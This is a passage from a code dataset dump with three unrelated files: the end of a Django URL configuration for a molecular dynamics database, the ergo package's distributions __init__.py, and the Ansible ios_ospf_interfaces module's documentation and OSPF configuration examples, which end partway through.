url(r'^dynamics/id/(?P<dynamics_id>[0-9]+)/$',views.query_dynamics, name='query_dynamics'),
url(r'^complex/id/(?P<complex_id>[0-9]+)/$',views.query_complex, name='query_complex'),
url(r'^references/$', views.REFERENCEview, name='references'),
url(r'^REFERENCEfilled/(?P<submission_id>[0-9]+)/$', views.REFERENCEview, name='REFERENCEfilled'),
url(r'^PROTEINfilled/(?P<submission_id>[0-9]+)/$', views.PROTEINview, name='PROTEINfilled'),
url(r'^submission_summary/(?P<submission_id>[0-9]+)/$', views.submission_summaryiew, name='submission_summary'),
url(r'^protein_summary/(?P<submission_id>[0-9]+)/$', views.protein_summaryiew, name='protein_summary'),
url(r'^molecule_summary/(?P<submission_id>[0-9]+)/$', views.molecule_summaryiew, name='molecule_summary'),
url(r'^model_summary/(?P<submission_id>[0-9]+)/$', views.model_summaryiew, name='model_summary'),
url(r'^molecule/(?P<submission_id>[0-9]+)/$', views.SMALL_MOLECULEview, name='molecule'),
url(r'^molecule/(?P<submission_id>[0-9]+)/delete/$', views.delete_molecule, name='delete_molecule'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.SMALL_MOLECULEreuseview, name='moleculereuse'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?generate_properties/$', views.generate_molecule_properties, name='generate_molecule_properties_reuse'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?delete/$', views.delete_molecule, name='delete_molecule_reuse'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?get_compound_info_pubchem/$', views.get_compound_info_pubchem, name='get_compound_info_pubchem_reuse'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?get_compound_info_chembl/$', views.get_compound_info_chembl, name='get_compound_info_chembl_reuse'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?submitpost/$', views.submitpost_view, name='submitpost_reuse'),
#url(r'^moleculereuse/open_pubchem/$', views.open_pubchem, name='molecule_open_pubchem_reuse'),
#url(r'^moleculereuse/open_chembl/$', views.open_chembl, name='molecule_open_chembl_reuse'),
url(r'^moleculereuse/(?:[0-9]+/)open_pubchem/$', views.open_pubchem, name='molecule_open_pubchem_reuse'),
url(r'^moleculereuse/(?:[0-9]+/)open_chembl/$', views.open_chembl, name='molecule_open_chembl_reuse'),
url(r'^molecule/(?P<submission_id>[0-9]+)/submitpost/$', views.submitpost_view, name='submitpost'),
url(r'^molecule/(?P<submission_id>[0-9]+)/generate_properties/$', views.generate_molecule_properties, name='generate_molecule_properties'),
url(r'^molecule/(?P<submission_id>[0-9]+)/get_compound_info_pubchem/$', views.get_compound_info_pubchem, name='get_compound_info_pubchem'),
url(r'^molecule/(?P<submission_id>[0-9]+)/get_compound_info_chembl/$', views.get_compound_info_chembl, name='get_compound_info_chembl'),
url(r'^molecule/open_pubchem/$', views.open_pubchem, name='molecule_open_pubchem'),
url(r'^molecule/open_chembl/$', views.open_chembl, name='molecule_open_chembl'),
url(r'^molecule2/(?P<submission_id>[0-9]+)/$', views.SMALL_MOLECULEview2, name='molecule2'),
url(r'^MOLECULEfilled/(?P<submission_id>[0-9]+)/$', views.SMALL_MOLECULEview, name='MOLECULEfilled'),
url(r'^MOLECULEfilled2/$', views.SMALL_MOLECULEview2, name='MOLECULEfilled2'),
url(r'^model/(?P<submission_id>[0-9]+)/$', views.MODELview, name='model'),
url(r'^(?P<form_type>model|dynamics)/(?P<submission_id>[0-9]+)/check_pdb_molecules/$', views.pdbcheck_molecule, name='pdbcheck_molecule'),
url(r'^(?P<form_type>dynamics)reuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?check_pdb_molecules/$', views.pdbcheck_molecule, name='pdbcheck_molecule'), #######
url(r'^(?P<form_type>model|dynamics)/(?P<submission_id>[0-9]+)/get_submission_molecule_info/$', views.get_submission_molecule_info, name='get_submission_molecule_info'),
url(r'^model/(?P<submission_id>[0-9]+)/ajax_pdbchecker/$', views.pdbcheck, name='pdbcheck'),
url(r'^model/(?P<submission_id>[0-9]+)/search_top/$',views.search_top,name='search_top'), #keep this one in a merge
url(r'^model/(?P<submission_id>[0-9]+)/upload_model_pdb/$', views.upload_model_pdb, name='upload_model_pdb'),
url(r'^modelreuse/(?P<submission_id>-?[0-9]+)/(?:[0-9]+/)?$', views.MODELreuseview, name='modelreuse'),
url(r'^proteinreuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?$', views.PROTEINreuseview, name='proteinreuse'),
# url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.SMALL_MOLECULEreuseview, name='moleculereuse'),
# url(r'^modelrow/$', views.MODELrowview, name='modelrow'),
url(r'^modelreuserequest/(?P<model_id>[0-9]+)/$', views.MODELreuseREQUESTview, name='modelreuserequest'),
url(r'^MODELfilled/(?P<submission_id>[0-9]+)/$', views.MODELview, name='MODELfilled'),
#url(r'^ajax_pdbchecker/(?P<submission_id>[0-9]+)/$', views.pdbcheck, name='pdbcheck'),
url(r'^search/$', SearchView(template='/protwis/sites/protwis/dynadb/templates/search/search.html', searchqueryset=sqs, form_class=MainSearchForm),name='haystack_search'),
url(r'^ajaxsearch/',views.ajaxsearcher,name='ajaxsearcher'),
url(r'^empty_search/',views.emptysearcher,name='emptysearcher'),
url(r'^autocomplete/',views.autocomplete,name='autocomplete'),
url(r'^advanced_search/$', views.NiceSearcher,name='NiceSearcher'),
#url(r'^search_top/(?P<submission_id>[0-9]+)/$',views.search_top,name='search_top'),
url(r'^dynamics/(?P<submission_id>[0-9]+)/$', views.DYNAMICSview, name='dynamics'),
url(r'^dynamics/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?upload_files/((?P<trajectory>traj)/)?$', views.upload_dynamics_files, name='dynamics_upload_files'),
url(r'^dynamicsreuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?upload_files/((?P<trajectory>traj)/)?$', views.upload_dynamics_files, name='dynamics_upload_files'),
url(r'^dynamics/(?P<submission_id>[0-9]+)/check_trajectories/$', views.check_trajectories, name='dynamics_check_trajectories'),
url(r'^dynamics/do_analysis/$', views.do_analysis, name='do_analysis'),
# url(r'^dynamicsreuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.DYNAMICSreuseview, name='dynamicsreuse'),
url(r'^dynamicsreuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.DYNAMICSview, name='dynamicsreuse'),
url(r'^DYNAMICSfilled/(?P<submission_id>[0-9]+)/$', views.DYNAMICSview, name='DYNAMICSfilled'),
#url(r'^form/$', views.get_formup, name='form'),
url(r'^model/carousel/(?P<model_id>[0-9]+)/$', views.carousel_model_components, name='carousel_model_components'),
url(r'^dynamics/carousel/(?P<dynamics_id>[0-9]+)/$', views.carousel_dynamics_components, name='carousel_dynamics_components'),
#url(r'^files/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT,}), #this line shouldnt be here
url(r'^submitted/(?P<submission_id>[0-9]+)/$', views.SUBMITTEDview, name='submitted'),
url(r'^close_submission/(?P<submission_id>[0-9]+)/$', views.close_submission, name='close_submission'),
url(r'^datasets/$', views.datasets, name='datasets'),
url(r'^table/$', views.table, name='table'),
url(r'^blank/$', TemplateView.as_view(template_name="dynadb/blank.html"), name='blank'),]
# url(r'^some_temp/$', views.some_view, name='some_temp')
# url(r'^prueba_varios/$', views.profile_setting, name='PRUEBA_varios'),
# File-serving routes, chosen by deployment mode.
# NOTE(review): `patterns()` and string-path views ('django.views.static.serve')
# were removed in Django 1.10 — this file targets an older Django; confirm the
# project's pinned version before upgrading.
if settings.DEBUG:
    # Development only: let Django itself serve uploaded media and static
    # assets. In production these should be handled by the web server.
    urlpatterns += patterns('',
        url(r'^files/(?P<path>.*)$', 'django.views.static.serve', {
            'document_root': settings.MEDIA_ROOT,
        }),
        url(r'^static/(?P<path>.*)$', 'django.views.static.serve', {
            'document_root': settings.STATIC_ROOT,
        }),
    )
else:
    # Production: submission files go through a project view so access can be
    # controlled; FILES_NO_LOGIN toggles whether authentication is required.
    if settings.FILES_NO_LOGIN:
        serve_files_func = views.serve_submission_files_no_login
    else:
        serve_files_func = views.serve_submission_files
    urlpatterns += patterns('',
        url(r'^files/(?P<obj_folder>[^/\\]+)/(?P<submission_folder>[^/\\]+)/(?P<path>.*)$', serve_files_func, name='serve_submission_files'),
    )
| 0 | 0 | 0 |
d4cb5753e8a045ecd7c806eb722ce2b1fd1f670b | 534 | py | Python | ergo/distributions/__init__.py | bmillwood/ergo | 34be736f1979ad7f1f130bb90728270cb58dbfe8 | [
"MIT"
] | 2 | 2020-06-04T17:06:51.000Z | 2021-01-03T04:41:05.000Z | ergo/distributions/__init__.py | bmillwood/ergo | 34be736f1979ad7f1f130bb90728270cb58dbfe8 | [
"MIT"
] | null | null | null | ergo/distributions/__init__.py | bmillwood/ergo | 34be736f1979ad7f1f130bb90728270cb58dbfe8 | [
"MIT"
] | null | null | null | from .base import (
BetaFromHits,
Categorical,
LogNormalFromInterval,
NormalFromInterval,
bernoulli,
beta,
beta_from_hits,
categorical,
flip,
halfnormal,
halfnormal_from_interval,
lognormal,
lognormal_from_interval,
normal,
normal_from_interval,
random_choice,
random_integer,
uniform,
)
from .distribution import Distribution
from .histogram import HistogramDist
from .location_scale_family import Logistic, Normal
from .logistic_mixture import LogisticMixture
| 21.36 | 51 | 0.741573 | from .base import (
BetaFromHits,
Categorical,
LogNormalFromInterval,
NormalFromInterval,
bernoulli,
beta,
beta_from_hits,
categorical,
flip,
halfnormal,
halfnormal_from_interval,
lognormal,
lognormal_from_interval,
normal,
normal_from_interval,
random_choice,
random_integer,
uniform,
)
from .distribution import Distribution
from .histogram import HistogramDist
from .location_scale_family import Logistic, Normal
from .logistic_mixture import LogisticMixture
| 0 | 0 | 0 |
dd87d93ed2081ca8d1584e8406400f689a4774e3 | 34,776 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/cisco/ios/plugins/modules/ios_ospf_interfaces.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/cisco/ios/plugins/modules/ios_ospf_interfaces.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/cisco/ios/plugins/modules/ios_ospf_interfaces.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | null | null | null | #!/usr/bin/python
#
# -*- coding: utf-8 -*-
# Copyright 2020 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#############################################
# WARNING #
#############################################
#
# This file is auto generated by the resource
# module builder playbook.
#
# Do not edit this file manually.
#
# Changes to this file will be over written
# by the resource module builder.
#
# Changes should be made in the model used to
# generate this file or in the resource module
# builder template.
#
#############################################
"""
The module file for ios_ospf_interfaces
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
module: ios_ospf_interfaces
short_description: OSPF_Interfaces resource module
description: This module configures and manages the Open Shortest Path First (OSPF)
version 2 on IOS platforms.
version_added: 1.0.0
author: Sumit Jaiswal (@justjais)
notes:
- Tested against Cisco IOSv Version 15.2 on VIRL.
- This module works with connection C(network_cli).
See U(https://docs.ansible.com/ansible/latest/network/user_guide/platform_ios.html)
options:
config:
description: A dictionary of OSPF interfaces options.
type: list
elements: dict
suboptions:
name:
description:
- Full name of the interface excluding any logical unit number,
i.e. GigabitEthernet0/1.
type: str
required: true
address_family:
description:
- OSPF interfaces settings on the interfaces in address-family
context.
type: list
elements: dict
suboptions:
afi:
description:
- Address Family Identifier (AFI) for OSPF interfaces settings
on the interfaces.
type: str
choices:
- ipv4
- ipv6
required: true
process:
description: OSPF interfaces process config
type: dict
suboptions:
id:
description:
- Address Family Identifier (AFI) for OSPF interfaces settings
on the interfaces. Please refer vendor documentation of Valid
values.
type: int
area_id:
description:
- OSPF interfaces area ID as a decimal value. Please
refer vendor documentation of Valid values.
- OSPF interfaces area ID in IP address format(e.g.
A.B.C.D)
type: str
secondaries:
description:
- Include or exclude secondary IP addresses.
- Valid only with IPv4 config
type: bool
instance_id:
description:
- Set the OSPF instance based on ID
- Valid only with IPv6 OSPF config
type: int
adjacency:
description: Adjacency staggering
type: bool
authentication:
description: Enable authentication
type: dict
suboptions:
key_chain:
description: Use a key-chain for cryptographic
authentication keys
type: str
message_digest:
description: Use message-digest authentication
type: bool
'null':
description: Use no authentication
type: bool
bfd:
description:
- BFD configuration commands
- Enable/Disable BFD on this interface
type: bool
cost:
description: Interface cost
type: dict
suboptions:
interface_cost:
description: Interface cost or Route cost of this interface
type: int
dynamic_cost:
description:
- Specify dynamic cost options
- Valid only with IPv6 OSPF config
type: dict
suboptions:
default:
description: Specify default link metric value
type: int
hysteresis:
description: Specify hysteresis value for LSA dampening
type: dict
suboptions:
percent:
description: Specify hysteresis percent changed.
Please refer vendor documentation of Valid values.
type: int
threshold:
description: Specify hysteresis threshold value.
Please refer vendor documentation of Valid values.
type: int
weight:
description: Specify weight to be placed on individual
metrics
type: dict
suboptions:
l2_factor:
description:
- Specify weight to be given to L2-factor metric
- Percentage weight of L2-factor metric. Please refer
vendor documentation of Valid values.
type: int
latency:
description:
- Specify weight to be given to latency metric.
- Percentage weight of latency metric. Please refer
vendor documentation of Valid values.
type: int
oc:
description:
- Specify weight to be given to cdr/mdr for oc
- Give 100 percent weightage for current data rate(0
for maxdatarate)
type: bool
resources:
description:
- Specify weight to be given to resources metric
- Percentage weight of resources metric. Please refer
vendor documentation of Valid values.
type: int
throughput:
description:
- Specify weight to be given to throughput metric
- Percentage weight of throughput metric. Please refer
vendor documentation of Valid values.
type: int
database_filter:
description: Filter OSPF LSA during synchronization and flooding
type: bool
dead_interval:
description: Interval after which a neighbor is declared dead
type: dict
suboptions:
time:
description: time in seconds
type: int
minimal:
description:
- Set to 1 second and set multiplier for Hellos
- Number of Hellos sent within 1 second. Please refer
vendor documentation of Valid values.
- Valid only with IP OSPF config
type: int
demand_circuit:
description: OSPF Demand Circuit, enable or disable
the demand circuit'
type: dict
suboptions:
enable:
description: Enable Demand Circuit
type: bool
ignore:
description: Ignore demand circuit auto-negotiation requests
type: bool
disable:
description:
- Disable demand circuit on this interface
- Valid only with IPv6 OSPF config
type: bool
flood_reduction:
description: OSPF Flood Reduction
type: bool
hello_interval:
description:
- Time between HELLO packets
- Please refer vendor documentation of Valid values.
type: int
lls:
description:
- Link-local Signaling (LLS) support
- Valid only with IP OSPF config
type: bool
manet:
description:
- Mobile Adhoc Networking options
- MANET Peering options
- Valid only with IPv6 OSPF config
type: dict
suboptions:
cost:
description: Redundant path cost improvement required to peer
type: dict
suboptions:
percent:
description: Relative incremental path cost.
Please refer vendor documentation of Valid values.
type: int
threshold:
description: Absolute incremental path cost.
Please refer vendor documentation of Valid values.
type: int
link_metrics:
description: Redundant path cost improvement required to peer
type: dict
suboptions:
set:
description: Enable link-metrics
type: bool
cost_threshold:
description: Minimum link cost threshold.
Please refer vendor documentation of Valid values.
type: int
mtu_ignore:
description: Ignores the MTU in DBD packets
type: bool
multi_area:
description:
- Set the OSPF multi-area ID
- Valid only with IP OSPF config
type: dict
suboptions:
id:
description:
- OSPF multi-area ID as a decimal value. Please refer vendor
documentation of Valid values.
- OSPF multi-area ID in IP address format(e.g. A.B.C.D)
type: int
cost:
description: Interface cost
type: int
neighbor:
description:
- OSPF neighbor link-local IPv6 address (X:X:X:X::X)
- Valid only with IPv6 OSPF config
type: dict
suboptions:
address:
description: Neighbor link-local IPv6 address
type: str
cost:
description: OSPF cost for point-to-multipoint neighbor
type: int
database_filter:
description: Filter OSPF LSA during synchronization and flooding for point-to-multipoint neighbor
type: bool
poll_interval:
description: OSPF dead-router polling interval
type: int
priority:
description: OSPF priority of non-broadcast neighbor
type: int
network:
description: Network type
type: dict
suboptions:
broadcast:
description: Specify OSPF broadcast multi-access network
type: bool
manet:
description:
- Specify MANET OSPF interface type
- Valid only with IPv6 OSPF config
type: bool
non_broadcast:
description: Specify OSPF NBMA network
type: bool
point_to_multipoint:
description: Specify OSPF point-to-multipoint network
type: bool
point_to_point:
description: Specify OSPF point-to-point network
type: bool
prefix_suppression:
description: Enable/Disable OSPF prefix suppression
type: bool
priority:
description: Router priority. Please refer vendor documentation
of Valid values.
type: int
resync_timeout:
description: Interval after which adjacency is reset if oob-resync
is not started. Please refer vendor documentation of Valid values.
type: int
retransmit_interval:
description: Time between retransmitting lost link state
advertisements. Please refer vendor documentation of Valid values.
type: int
shutdown:
description: Set OSPF protocol's state to disable under
current interface
type: bool
transmit_delay:
description: Link state transmit delay.
Please refer vendor documentation of Valid values.
type: int
ttl_security:
description:
- TTL security check
- Valid only with IPV4 OSPF config
type: dict
suboptions:
set:
description: Enable TTL Security on all interfaces
type: bool
hops:
description:
- Maximum number of IP hops allowed
- Please refer vendor documentation of Valid values.
type: int
running_config:
description:
- This option is used only with state I(parsed).
- The value of this option should be the output received from the IOS
device by executing the command B(sh running-config | section
^interface).
- The state I(parsed) reads the configuration from C(running_config)
option and transforms it into Ansible structured data as per the
resource module's argspec and the value is then returned in the
I(parsed) key within the result.
type: str
state:
description:
- The state the configuration should be left in
- The states I(rendered), I(gathered) and I(parsed) does not perform any
change on the device.
- The state I(rendered) will transform the configuration in C(config)
option to platform specific CLI commands which will be returned in the
I(rendered) key within the result. For state I(rendered) active
connection to remote host is not required.
- The state I(gathered) will fetch the running configuration from device
and transform it into structured data in the format as per the resource
module argspec and the value is returned in the I(gathered) key within
the result.
- The state I(parsed) reads the configuration from C(running_config)
option and transforms it into JSON format as per the resource module
parameters and the value is returned in the I(parsed) key within the
result. The value of C(running_config) option should be the same format
as the output of command I(show running-config | include ip route|ipv6
route) executed on device. For state I(parsed) active connection to
remote host is not required.
type: str
choices:
- merged
- replaced
- overridden
- deleted
- gathered
- rendered
- parsed
default: merged
"""
EXAMPLES = """
# Using deleted
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
- name: Delete provided OSPF Interface config
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
state: deleted
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/1",
# "no ipv6 ospf 55 area 105",
# "no ipv6 ospf adjacency stagger disable",
# "no ipv6 ospf priority 20",
# "no ipv6 ospf transmit-delay 30"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
# Using deleted without any config passed (NOTE: This will delete all OSPF Interfaces configuration from device)
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
- name: Delete all OSPF config from interfaces
cisco.ios.ios_ospf_interfaces:
state: deleted
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/2",
# "no ip ospf 10 area 20",
# "no ip ospf adjacency stagger disable",
# "no ip ospf cost 30",
# "no ip ospf priority 40",
# "no ip ospf ttl-security hops 50",
# "interface GigabitEthernet0/1",
# "no ipv6 ospf 55 area 105",
# "no ipv6 ospf adjacency stagger disable",
# "no ipv6 ospf priority 20",
# "no ipv6 ospf transmit-delay 30"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# interface GigabitEthernet0/2
# Using merged
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# router-ios#
- name: Merge provided OSPF Interfaces configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
address_family:
- afi: ipv4
process:
id: 10
area_id: 30
adjacency: true
bfd: true
cost:
interface_cost: 5
dead_interval:
time: 5
demand_circuit:
ignore: true
network:
broadcast: true
priority: 25
resync_timeout: 10
shutdown: true
ttl_security:
hops: 50
- afi: ipv6
process:
id: 35
area_id: 45
adjacency: true
database_filter: true
manet:
link_metrics:
cost_threshold: 10
priority: 55
transmit_delay: 45
state: merged
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/1",
# "ip ospf 10 area 30",
# "ip ospf adjacency stagger disable",
# "ip ospf bfd",
# "ip ospf cost 5",
# "ip ospf dead-interval 5",
# "ip ospf demand-circuit ignore",
# "ip ospf network broadcast",
# "ip ospf priority 25",
# "ip ospf resync-timeout 10",
# "ip ospf shutdown",
# "ip ospf ttl-security hops 50",
# "ipv6 ospf 35 area 45",
# "ipv6 ospf adjacency stagger disable",
# "ipv6 ospf database-filter all out",
# "ipv6 ospf manet peering link-metrics 10",
# "ipv6 ospf priority 55",
# "ipv6 ospf transmit-delay 45"
# ]
# After state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
# Using overridden
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
- name: Override provided OSPF Interfaces configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
address_family:
- afi: ipv6
process:
id: 55
area_id: 105
adjacency: true
priority: 20
transmit_delay: 30
- name: GigabitEthernet0/2
address_family:
- afi: ipv4
process:
id: 10
area_id: 20
adjacency: true
cost:
interface_cost: 30
priority: 40
ttl_security:
hops: 50
state: overridden
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/2",
# "ip ospf 10 area 20",
# "ip ospf adjacency stagger disable",
# "ip ospf cost 30",
# "ip ospf priority 40",
# "ip ospf ttl-security hops 50",
# "interface GigabitEthernet0/1",
# "ipv6 ospf 55 area 105",
# "no ipv6 ospf database-filter all out",
# "no ipv6 ospf manet peering link-metrics 10",
# "ipv6 ospf priority 20",
# "ipv6 ospf transmit-delay 30",
# "no ip ospf 10 area 30",
# "no ip ospf adjacency stagger disable",
# "no ip ospf bfd",
# "no ip ospf cost 5",
# "no ip ospf dead-interval 5",
# "no ip ospf demand-circuit ignore",
# "no ip ospf network broadcast",
# "no ip ospf priority 25",
# "no ip ospf resync-timeout 10",
# "no ip ospf shutdown",
# "no ip ospf ttl-security hops 50"
# ]
# After state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
# Using replaced
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
- name: Replaced provided OSPF Interfaces configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/2
address_family:
- afi: ipv6
process:
id: 55
area_id: 105
adjacency: true
priority: 20
transmit_delay: 30
state: replaced
# Commands Fired:
# ---------------
# "commands": [
# "interface GigabitEthernet0/2",
# "ipv6 ospf 55 area 105",
# "ipv6 ospf adjacency stagger disable",
# "ipv6 ospf priority 20",
# "ipv6 ospf transmit-delay 30"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# Using Gathered
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
- name: Gather OSPF Interfaces provided configurations
cisco.ios.ios_ospf_interfaces:
config:
state: gathered
# Module Execution Result:
# ------------------------
#
# "gathered": [
# {
# "name": "GigabitEthernet0/2"
# },
# {
# "address_family": [
# {
# "adjacency": true,
# "afi": "ipv4",
# "bfd": true,
# "cost": {
# "interface_cost": 5
# },
# "dead_interval": {
# "time": 5
# },
# "demand_circuit": {
# "ignore": true
# },
# "network": {
# "broadcast": true
# },
# "priority": 25,
# "process": {
# "area_id": "30",
# "id": 10
# },
# "resync_timeout": 10,
# "shutdown": true,
# "ttl_security": {
# "hops": 50
# }
# },
# {
# "adjacency": true,
# "afi": "ipv6",
# "database_filter": true,
# "manet": {
# "link_metrics": {
# "cost_threshold": 10
# }
# },
# "priority": 55,
# "process": {
# "area_id": "45",
# "id": 35
# },
# "transmit_delay": 45
# }
# ],
# "name": "GigabitEthernet0/1"
# },
# {
# "name": "GigabitEthernet0/0"
# }
# ]
# After state:
# ------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
# Using Rendered
- name: Render the commands for provided configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
address_family:
- afi: ipv4
process:
id: 10
area_id: 30
adjacency: true
bfd: true
cost:
interface_cost: 5
dead_interval:
time: 5
demand_circuit:
ignore: true
network:
broadcast: true
priority: 25
resync_timeout: 10
shutdown: true
ttl_security:
hops: 50
- afi: ipv6
process:
id: 35
area_id: 45
adjacency: true
database_filter: true
manet:
link_metrics:
cost_threshold: 10
priority: 55
transmit_delay: 45
state: rendered
# Module Execution Result:
# ------------------------
#
# "rendered": [
# "interface GigabitEthernet0/1",
# "ip ospf 10 area 30",
# "ip ospf adjacency stagger disable",
# "ip ospf bfd",
# "ip ospf cost 5",
# "ip ospf dead-interval 5",
# "ip ospf demand-circuit ignore",
# "ip ospf network broadcast",
